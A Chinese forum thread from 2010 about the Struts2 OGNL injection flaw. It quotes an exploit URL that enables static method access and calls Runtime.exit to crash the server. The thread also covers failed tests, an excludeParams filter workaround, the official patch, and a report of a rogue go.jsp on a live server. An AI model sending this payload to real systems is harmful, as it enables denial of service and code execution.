|
该帖已经被评为精华帖
|
|
|---|---|
| 作者 | 正文 |
|
发表时间:2010-08-02
http://localhost/login.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
没测试成功 struts 2.0.11 ognl 2.6 不知道是何原因 |
| 返回顶楼 | |
|
发表时间:2010-08-03
我修改了struts2-core-2.0.11.1.jar-->
struts-default.xml-->defaultStack-->params-->excludeParams的值, 原先的值是:dojo\..*,改为:dojo\..*,.*\\u0023.* ,测试OK |
| 返回顶楼 | |
|
发表时间:2010-08-03
mlw2000 写道 我修改了struts2-core-2.0.11.1.jar-->
struts-default.xml-->defaultStack-->params-->excludeParams的值, 原先的值是:dojo\..*,改为:dojo\..*,.*\\u0023.* ,测试OK 我也试过了,怎么不行? |
| 返回顶楼 | |
|
发表时间:2010-08-04
哪个哥们无聊在我线上的服务器上建了个go.jsp?
|
| 返回顶楼 | |
|
发表时间:2010-08-04
waterdh 写道 哪个哥们无聊在我线上的服务器上建了个go.jsp?
晕,测试玩?? 汗…………都告诉大家了“此处代码有破坏性,请在测试环境执行,严禁用此种方法进行恶意攻击 ” |
| 返回顶楼 | |
|
发表时间:2010-08-04
看到这个go.jsp的时候,寒毛都竖起来了,整整有2g那么大。
还好现在都已经打上补丁了。 |
| 返回顶楼 | |
|
发表时间:2010-08-05
struts2 已经针对这个问题提供了补丁,http://svn.apache.org/viewvc?view=revision&revision=956389上有下载。将com/opensymphony/xwork2/interceptor/ParametersInterceptor.java加入到自己的项目中就行了
|
| 返回顶楼 | |
|
发表时间:2010-08-05
Aaronlong31 写道 struts2 已经针对这个问题提供了补丁,http://svn.apache.org/viewvc?view=revision&revision=956389上有下载。将com/opensymphony/xwork2/interceptor/ParametersInterceptor.java加入到自己的项目中就行了
恩 
|
| 返回顶楼 | |
|
发表时间:2010-08-09
问题已经解决
|
| 返回顶楼 | |
|
发表时间:2010-08-13
xxdneu 写道 http://localhost/login.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
没测试成功 struts 2.0.11 ognl 2.6 不知道是何原因 同样也是没有成功 struts 2.0.14 ognl 2.6.11 |
| 返回顶楼 | |
